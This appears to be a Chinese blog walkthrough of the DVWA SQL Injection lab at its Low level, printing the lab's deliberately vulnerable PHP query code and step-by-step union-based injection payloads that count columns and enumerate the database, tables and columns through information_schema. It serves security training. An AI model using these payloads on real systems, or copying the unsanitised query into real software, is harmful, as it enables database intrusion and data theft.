2. 程式人生 > 其它 >DVWA-SQL Injection(SQL注入)

DVWA-SQL Injection(SQL注入)

阿新 發佈:2022-05-30

sql注入是典型、常見的Web漏洞之一,現在在網路中也可能存在,不過大多數為SQL盲注
攻擊者通過惡意的SQL語句來破壞SQL查詢語句,達到資料庫洩露的目的

LOW

審計原始碼

<?php
// 判斷是否提交
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // 獲取傳入的 id
    $id = $_REQUEST[ 'id' ];
    // switch case 語句,類似於if elif else語句
    // 判斷資料庫型別
    switch ($_DVWA['SQLI_DB']) {
        // mysql資料庫
        case MYSQL:
            // 定義sql語句
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            // 進行資料庫查詢
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // 從結果集中取得一行作為關聯陣列
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // 獲取 first_name 和 last_name 欄位內容
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // 列印使用者資訊
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        // sqlite資料庫
        case SQLITE:
            global $sqlite_db_connection;

            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    } 
}

?>

通過觀察,只是判斷了伺服器的資料庫,沒有對我們傳入的ID進行一些過濾,可以直接進行SQL注入

union 聯合查詢注入

判斷注入型別

使用1或者1a來進行判斷,如果是數字型別,1a就會報錯
http://172.19.31.9/dvwa/vulnerabilities/sqli/?id=1a&Submit=Submit#

1a正常執行,可以看出是字元型的,需要我們輸入'進行閉合
構造閉合id=1'#

正常回顯

order by 判斷欄位數

1' order by 1#

正常執行
在輸入1' order by 3#時,進行了報錯

那麼就是有兩個欄位數

union select 1,2查看回顯欄位

1' union select 1,2 #



這裡成功回顯了我們select 1,2的值,也顯示了上一個註釋的語句的輸出,可以輸入
-1' union select 1,2 #,-1讓前面的語句報錯,只顯示了後面的查詢內容

database()獲取當前資料庫

-1' union select user(),version()#

回顯了當前資料庫的使用者、資料庫版本號
再次使用database()、@@datadir,獲取資料庫目錄和當前資料庫名
-1' union select @@datadir,database()#

得到當前資料庫名為dvwa

獲取dvwa資料庫中的表

-1' union select table_name,2 from information_schema.tables where table_schema=database()#



發現報錯,這裡是欄位列的編碼格式不一樣,只需要把table_namehex()函式包裹起來,因為mysql是認識十六進位制的
-1' union select hex(table_name),2 from information_schema.tables where table_schema=database()#

First name列中,顯示了兩次的資料,代表有兩個資料庫,將其中的十六進位制解碼得到
使用HackBar解碼後得到6775657374626F6F6B的值為guestbook,另一個是users

有時候其他的靶場只能回顯一段資料,不像現在一樣回顯兩段資料,可以使用group_concat,將每行的資料使用,隔開進行顯示
-1' union select group_concat(hex(table_name)),2 from information_schema.tables where table_schema=database()#

這樣就顯示了一段資料

獲取users表中的欄位名

-1' union select column_name,2 from information_schema.columns where table_schema=database() and table_name=0x7573657273#
查詢資料庫中欄位的名稱,where用篩選到dvwa資料庫中的users表,database()執行轉換為dvwa,mysql可以讀取十六進位制,0x7573657273users
查詢報錯

相關推薦

DVWA 通關指南:SQL Injection (SQL 注入)

目錄SQL Injection (SQL 注入)Low Level原始碼審計攻擊方法判斷注入型別判斷幾列可控獲取表中的欄位名獲取目標資訊Medium Level原始碼審計攻擊方式判斷注入型別判斷幾列可控獲取表中的欄位名獲取目標資訊High Level原

DVWA-SQL Injection(SQL注入)

sql注入是典型、常見的Web漏洞之一,現在在網路中也可能存在,不過大多數為SQL盲注。

補檔--【THM】SQL Injection(SQL注入漏洞)-學習

本文相關的TryHackMe實驗房間連結:https://tryhackme.com/room/sqlinjectionlm 通過學習相關知識點:瞭解如何檢測和利用 SQL 注入漏洞

新手DVWA-SQL Injection (Blind)

SQL Injection (Blind) SQL Injection (Blind)即SQL盲注,同樣是由於web應用程式對使用者輸入資料沒有進行過濾或過濾不完全,導致輸入資料破壞原有SQL語句並執行惡意指令,與SQL注入區別在於SQL盲注沒有回顯,無法直

SQL注入DVWA平臺測試mysql注入

今天主要針對mysql常用注入語句進行測試。測試環境與工具:測試平臺:DVWA,下載地址:http://down.51cto.com/data/875088,也可下載metaspolit-table2虛擬機器,裡面已經部署好了dvwa.。***工具:burpsui

DVWA各等級sql注入

sql全等級注入 level:low <?php if( isset( $_REQUEST[ \'Submit\' ] ) ) {//判斷submit是否存在

記一次DVWA下的SQL注入測試

技術標籤:Web 漏洞解析sql安全漏洞mysql安全 文章目錄 一、前言二、Low級別的測三、Medium級別的測試

DVWA——SQL Injection (Blind)(low)

技術標籤:# low安全 SQL Injection (Blind) 介面 原始碼 <?php if( isset( $_GET[ \'Submit\' ] ) ) {

DVWA-SQL Injection(Blind)

LOW 1.判斷是否存在注入 輸入1顯示使用者存在 輸入1’ and 1 = 1 – ’ 顯示使用者存在 輸入1‘ and 1 = 2 – ’顯示使用者不存在,說明存在字元型的SQL盲注。

OWASPBWA中DVWA 靶機的SQL注入

難度等級:Low 簡單輸入1查詢看出正常搜尋的樣子 輸入基礎的1 or 1=1 #看到注入未生效,與輸入1返回的結果相同

SQL Injection Attack Lec&Lab SQL注入 Solution Seed

SQL Injection Attack Lec&Lab SQL 注入是一種程式碼注入技術,它利用 Web 應用程式和資料庫伺服器之間的介面中的漏洞。當用戶的輸入在傳送到後端資料庫伺服器之前未在 Web 應用程式中正確檢查時,就會出現此漏洞

DVWA-SQL Injection (Bind) SQL盲注

盲注同於union select查詢注入,盲注只能得到資料庫回顯的正確和錯誤,利用返回的正確和錯誤一個一個判斷。

DVWA靶場——Command Injection(命令注入)

概述 Command Injection,即命令注入,是指通過提交惡意構造的引數破壞命令語句結構,從而達到執行惡意命令的目的。PHP命令注入攻擊漏洞是PHP應用程式中常見的指令碼漏洞之一,國內著名的Web應用程式Discuz!、DedeCM

網路安全知識--PHP程式碼審計/Web For Pantesters 的 SQL injection

SQL 注入一般流程 判斷有無注入 單引號判斷: ?name=root\'對應語句 select * from table where name=\'root\'\' 不符合語法規範,報錯,說明有注入

攻防世界-web-unfinish(sql二次注入

題目來源:網鼎杯 2018題目描述:SQL 題目如下,是個登入頁面 通過awvs掃描得知存在register.php註冊頁面,並且註冊介面存在SQL盲注漏洞。

攻防世界-web-comment(密碼爆破、.git洩漏、程式碼審計、sql二次注入

題目來源:網鼎杯 2018題目描述:SQL 一、密碼爆破 進入場景後,點擊發帖,輸入內容提交後,系統返回登入頁面

Web滲透測試|SQL報錯注入

歡迎點選「演算法與程式設計之美」↑關注我們! 本文首發於微信公眾號:"演算法與程式設計之美",歡迎關注,及時瞭解更多此係列文章。

SQL Injection

環境 虛擬機器 :VMFusion 11.5.0 專業版 使用VMFusion載入OAWAS靶機虛擬機器檔案。 low難度

SQL Injection Diary 4

0x00 What we learned yesterdaty? We\'ve learned how to add data or insert data into a table. Then we learned how to select all data of a table and renew some special data of the table

sql 報錯注入

技術標籤:web安全 sql報錯注入 ​ 報錯注入就是利用了資料庫的某些機制,人為地製造錯誤條件,使得查詢結果能夠出現在錯誤資訊中。